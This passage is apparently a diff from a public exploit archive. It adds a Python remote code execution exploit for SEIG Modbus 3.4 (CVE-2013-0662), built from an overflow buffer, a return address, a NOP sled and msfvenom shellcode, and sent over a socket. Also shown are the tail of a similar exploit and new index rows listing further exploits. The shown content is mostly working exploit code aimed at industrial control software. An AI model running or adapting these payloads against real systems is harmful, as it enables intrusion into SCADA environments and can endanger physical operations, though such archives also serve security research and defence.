shellcode += "\x0b\xa3\xaa\xba\x2c\x49\xf0\x26\xaa\xab\xce\x5a\xc3"
|
||||
shellcode += "\x41\x69\x60\xc4\x58\x71\x71\x9c\x3f\xbe\xc2\xbc\x49"
|
||||
shellcode += "\xdd\xab\x89\xf0\x46\xcb\x1a\x8a\xf1\xdb\xe5\x54\x1f"
|
||||
shellcode += "\xfb\x30\x3b\xb1\x17\x97\xb2\x3e\x31\xf8\x26\x13\x9c"
|
||||
shellcode += "\x16\xdd\x26\x7a\xe3\x9b\x6e\x29\x77\x49\xc7\x97\x98"
|
||||
shellcode += "\x39\x7b\x5f\xcd\xeb\x4a\x39\x6e\x66\x04\xbc\x6c\xa6"
|
||||
shellcode += "\x87\x01\x63\x4d\xf3\x35\xc9\x74\x35\xdf\xe7\x1f\x0c"
|
||||
shellcode += "\xd0\x69\x80\x8c\x5c\xde\x63\xfc\x19\x1b\x8e\x24\x3b"
|
||||
shellcode += "\x7e\x01\x97\x6f\x67\x8f\x07\x3f\x32\x13\x23\x80\x7e"
|
||||
shellcode += "\x9a\x01\x5a\xc0\x3c\xf9\xf5\x5a\x04\xb0\x54\x46\x0c"
|
||||
shellcode += "\xfb\x21\x4d\xd7\xe0\xb4\x02\xe5\x4c\x04\x5a\x5e\x37"
|
||||
shellcode += "\xd1\x61\x6d\xe1\x4d\xe8\xa8\xdf\x26\xdb\x55\x5a\x60"
|
||||
shellcode += "\x85\x68\x05\x6a\x21\x73\xdf\x73\xa4\xef\x26\x02\x7e"
|
||||
shellcode += "\xb0\xb1\xa6\xb1\xac\x15\x0f\x80\x34\xae\xe4\x8a"
|
||||
|
||||
JUNK = "JUNK"*5202 # 20808 Bytes of JUNK
|
||||
|
||||
payload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK
|
||||
print "Payload length: "+str(len(payload))
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect(con)
|
||||
s.send(payload)
|
||||
s.recv(10)
|
65
exploits/windows_x86/remote/45220.py
Executable file
65
exploits/windows_x86/remote/45220.py
Executable file
@ -0,0 +1,65 @@
# Title: SEIG Modbus 3.4 - Remote Code Execution
|
||||
# Author: Alejandro Parodi
|
||||
# Date: 2018-08-17
|
||||
# Vendor Homepage: https://www.schneider-electric.com
|
||||
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
|
||||
# Version: v3.4
|
||||
# Tested on: Windows XP SP3
|
||||
# CVE: CVE-2013-0662
|
||||
# References:
|
||||
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
|
||||
|
||||
import socket
|
||||
import struct
|
||||
|
||||
ip = "192.168.127.138"
|
||||
port = 27700
|
||||
con = (ip, port)
|
||||
|
||||
|
||||
####### MESSAGE ##########
|
||||
message_header = "\x00\x64"
|
||||
message_buffer = "A" * 0x5dc
|
||||
eip = struct.pack("<I", 0x7C9C167D)
|
||||
|
||||
# Shellcode generated with:
|
||||
# msfvenom -a x86 --platform windows -p windows/exec cmd=calc -e x86/xor_call4 -f python
|
||||
# Shellcode Size: 189 bytes
|
||||
nopsleed = "\x90" * 100 # \x90 bad char bypass
|
||||
shellcode = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
|
||||
shellcode += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
|
||||
shellcode += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
|
||||
shellcode += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
|
||||
shellcode += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
|
||||
shellcode += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
|
||||
shellcode += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
|
||||
shellcode += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
|
||||
shellcode += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
|
||||
shellcode += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
|
||||
shellcode += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
|
||||
shellcode += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
|
||||
shellcode += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
|
||||
shellcode += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
|
||||
shellcode += "\xff\xd5\x63\x61\x6c\x63\x00"
|
||||
|
||||
message = message_header + message_buffer + eip + nopsleed + shellcode
|
||||
print "Message Len: " + hex(len(message)) + " bytes"
|
||||
##########################
|
||||
|
||||
######## PKG HEADER ######
|
||||
header_padding = "\x42\x42"
|
||||
header_buf_size = "\xFF\xFF"
|
||||
header_recv_len = struct.pack(">H", len(message))
|
||||
header_end = "\x44"
|
||||
|
||||
header = header_padding + header_buf_size + header_recv_len + header_end
|
||||
##########################
|
||||
|
||||
######## CRAFTING PAYLOAD ########
|
||||
payload = header + message
|
||||
print "Package Len: "+hex(len(payload)) + " bytes"
|
||||
##################################
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect(con)
|
||||
s.send(payload)
|
@ -6055,6 +6055,10 @@ id,file,description,date,author,type,platform,port
45215,exploits/windows/dos/45215.js,"Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
|
||||
45216,exploits/windows/dos/45216.js,"Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
|
||||
45217,exploits/windows/dos/45217.js,"Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion",2018-08-17,"Google Security Research",dos,windows,
|
||||
45219,exploits/windows_x86/dos/45219.py,"SEIG Modbus 3.4 - Denial of Service (PoC)",2018-08-20,"Alejandro Parodi",dos,windows_x86,27700
|
||||
45222,exploits/windows_x86-64/dos/45222.py,"Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86-64,
|
||||
45223,exploits/windows_x86-64/dos/45223.py,"Restorator 1793 - Denial of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86-64,
|
||||
45226,exploits/windows_x86/dos/45226.py,"Prime95 29.4b7 - Denial Of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
@ -16700,6 +16704,9 @@ id,file,description,date,author,type,platform,port
45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
|
||||
45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,
|
||||
45210,exploits/linux/remote/45210.py,"OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)",2018-08-16,"Matthew Daley",remote,linux,
|
||||
45218,exploits/windows_x86/remote/45218.py,"SEIG SCADA System 9 - Remote Code Execution",2018-08-19,"Alejandro Parodi",remote,windows_x86,12397
|
||||
45220,exploits/windows_x86/remote/45220.py,"SEIG Modbus 3.4 - Remote Code Execution",2018-08-20,"Alejandro Parodi",remote,windows_x86,
|
||||
45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
@ -39817,3 +39824,7 @@ id,file,description,date,author,type,platform,port
45206,exploits/php/webapps/45206.txt,"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
|
||||
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80
|
||||
45212,exploits/hardware/webapps/45212.py,"ADM 3.1.2RHG1 - Remote Code Execution",2018-08-17,"Matthew Fulton",webapps,hardware,443
|
||||
45221,exploits/php/webapps/45221.txt,"WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection",2018-08-20,"Çlirim Emini",webapps,php,80
|
||||
45224,exploits/php/webapps/45224.txt,"MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery",2018-08-20,0xB9,webapps,php,80
|
||||
45225,exploits/php/webapps/45225.txt,"WordPress Plugin Tagregator 0.6 - Cross-Site Scripting",2018-08-20,ManhNho,webapps,php,
|
||||
45228,exploits/php/webapps/45228.txt,"Countly - Persistent Cross-Site Scripting",2018-08-20,Sleepy,webapps,php,
|
||||